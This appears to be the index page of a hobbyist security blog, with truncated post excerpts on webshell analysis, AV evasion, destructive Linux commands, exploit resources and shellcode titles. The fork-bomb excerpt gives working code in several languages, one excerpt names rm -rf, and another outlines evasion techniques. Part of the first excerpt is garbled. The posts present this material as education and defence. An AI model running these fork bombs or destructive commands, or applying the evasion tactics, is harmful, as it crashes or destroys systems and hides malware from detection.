Posts

Decryption and Analysis of a "Shell" Backdoor

Image
UPDATE [l] : shortly after finishing this post, I had decided to do a couple scans of the raw code. The results returned several Shell Trojan variants, and doing some permanent damage to windows systems. Reports available at ] VirusTotal ] and [ Malwr ]. Thanks to both services for the great results. It attempted network connx with the original url, not surprise from a webshell, IMO, only a bit strange that the likely 0wn/Op would keep such a trophy case in the wild like that? I mean really??. I would've expected an http request or few since nce that's who was hosting the assets but the requests were made to connect to "Hostthshellcode and then starts the endless streaming of the v1c's data and a continual stream of fresh code for the mal to swap out. This only confirmed the feeling I had about the src code. Multiple langs being used, illogical syntax and it's all just mixed together... if anyone can answer how this can support the back and forth exec using Perl,

Malware and Successful AV Evasion Tactics

The malware ideology, and even it's entire methodology has morphed over the last year or so. It was decided to write a piece to offer some clarity on the idea of “AV evasion”. There seems to be little in depth working knowledge of the actual various techniques used. Time for a quick lesson to give more definition to this increasingly popular malicious scripting. Below is a list of some of the current successful antivirus evasion tactics used by malware. Hash modification. One way AV’s are able to detect if a file is (or contains) a known malware by calculating the file hash. It avoids this detection by changing a simple bit in the binary thus allowing the file to evade any &OR hash detections. Specific malware signatures. Some signatures are specifically designed to catch an exploit or otherwise spotted by specific behaviors. By only reversing the signature, it is possible for this to modify the malware so no matching patterns reside in it's signature. Just one exam

Twelve Unique Linux Commands that Should Never be Used

After implementing a fork bomb in eleven different language implementations ~] the tuto [~ , I got inspired to revisit the few strings when executed in the Linux terminal, can be all kinds of destructive to the host. I'm not re-inventing the wheel here. Many of you probably know them, (and the variants), there's nothing new here. However, it's a good practice to review these type of things from time to time. So enjoy but do not run any of these on your system. I have provided descriptions for each, discussing what the results will be if you make a mistake. If these are new to you, understand the precautions, and do not use any of these. Thank you. . rm rf The rm -rf command is a simplistic, low level cmd an one of the fastest ways to delete files, dirs and their contents. But a little ignorance of the cmds may result in an unrecoverable system, even damage hw. Some of the destructive options used with rm are: . rm              //* base cmd used to delete files. .

fork-bomb in several language implements

anyone that has worked with Linux for any amount of time, the word fork bomb will be familiar. However, it's not just a terminal command. Below are some implementations in other languages, followed by mitigation tactics for Linux distros. BASH $ :(){ :|: & };: .sh (Shell file) #!/bin/bash ./$0|./$0& .bat (Windows bat implements) :TOP start "" %0 goto TOP ~OR~ %0|%0   #below is the same, but done in command line using ^ to escape specials: echo %0^|%0 > forkbomb.bat forkbomb.bat .pl (Perl implement) #! /bin/perl perl -e "fork while fork" & .py (Python implement) #! /bin/py import os while 1:     os.fork() (Java implement) public class ForkBomb {  public static void main(String[] args)   {    while(true)    { Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});   }  } } .js (Jav

Excellent exploit writing resources and a large Shellcode db

Image
A little collection I've put together for the craft of exploit writing and shellcode use. Guide books, resources and one large Shellcode DB for the finish (bottom link). Stack-based Windows Buffer Overflow A large collection of  Exploit Tutos  by our friends at  Fuzzy Sec Windows Exploit Development  using the Immunity Debugger . Thanks to Sift Security Shellcoder's Handbook 0x2 exploit tuto - Web havking with BurpSuite 0x7 exploit tuto - web scanning and exploitation Shellcode source repo , a large collection of code by category, with Exploit name and desciption. Cheerz...   d_c0

Another Journey into a Malicious Abyss

Image
This anonymous submission came to us a few days ago, only with the knowledge that the this payload tripped and was dropped by an Enterprise level A/V appliance. The 'submitter' got their hands on it and asked us to break it down. For this project, I elicited the help of F1re_W1re , a very good c0d3r as well as a very good brother. we have worked together many times in the past, with nothing but amazing results. When a second set of eyes or decoded iteration is needed, he is my go to. A hat tip to you, Sir. This project was a true collaboration of skillz to which I graciously thank him for his role as primary contributor. For reasons, I assumed the role of  Project Manager (PM), and Lead Consultant . This was solved by both of us doing out part and offering input and direction as needed. Often time it takes another set of eyes to see what's there, (or just not apparent). You will get what I mean later on. Let's get at it!! After acquiring the sample, it was clear th

New 2017 Shellcode | Titles -- Link Direct to Code

Image
I've compiled a list of the most current shellcodes and linked each directly to their raw code. I am providing this list for analytical purpose to those that may be interested. Enjoy and use responsibly... Windows x64 password protected bind shellcode. Windows x64 CreateRemoteThread() DLL injection shellcode. Linux/x86_x64 mkdir("ajit", 755) shellcode. Linux/x86_64 shellcode that binds to TCP/5600. Linux/x86_64 execve /bin/sh shellcode. Linux multi/dual mode execve("/bin/sh", NULL, 0) shellcode. Linux multi/dual mode reverse shell shellcode. Linux/x86 reverse TCP alphanumeric staged shellcode. Linux dual / multi mode bind shell shellcode. Windows x86 protect process shellcode. Linux reverse shell shellcode. Linux x86-64 egghunter shellcode. Linux x86_64 random listener Windows x86 executable directory search shellcode. RSA Asymmetric Polymorphic Shellcode. Windows x86 reverse TCP staged alphanumeric shellcode. Linux x86_64 polymorphic setui

Various 'must have' Online Tools for Sec, pt 1

There are two updates to this post, (seen in white )... UPDATE : another good online static malware analysis tool we all know and love, is back up and running. Based on the Cuckoo Sandbox: ~]  Malwr.com  [~ There's many tricks and trade secrets that we (or anyone within cybersec) just don't share. We have decided that there are just some online tools just too good to keep a secret. If they do, they arent around for long, a kind of respect thing. I have another shortlist of very handy online tools at the bottom of our most recent reversing and analysis ~] decoding a malicious webshell  [~ . These play a big part in our processes and used several times daily. Some of these below you may be familiar with, or not, or maybe even use already. If not, you should commit these to memory. Trust us, these will always come in handy. This is only a shortlist, we will add more/update as appropriate. The first you hopefully are quite familiar with, if you are not using this religious